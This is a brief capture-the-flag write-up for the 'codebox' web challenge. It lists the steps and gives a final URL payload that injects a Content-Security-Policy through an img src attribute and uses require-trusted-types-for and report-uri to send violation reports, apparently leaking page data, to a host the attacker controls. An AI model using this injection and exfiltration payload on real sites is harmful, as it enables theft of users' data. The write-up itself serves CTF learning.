Tags: web 

Rating:

# tl;dr
* use img src to inject csp
* use `report-uri your-domain` to get csp violation reports
* use `require-trusted-types-for 'script'` to get violation when innerHTML is set
* use `code=&code<payload>` to make code `undefined` in front end

Final Payload: `https://codebox.mc.ax/?code=&code=<img+src="*;+require-trusted-types-for+'script'+;+report-uri+https://your.domain.com/"+>`

Original writeup (https://lu513n.com/blog/posts/codebox/).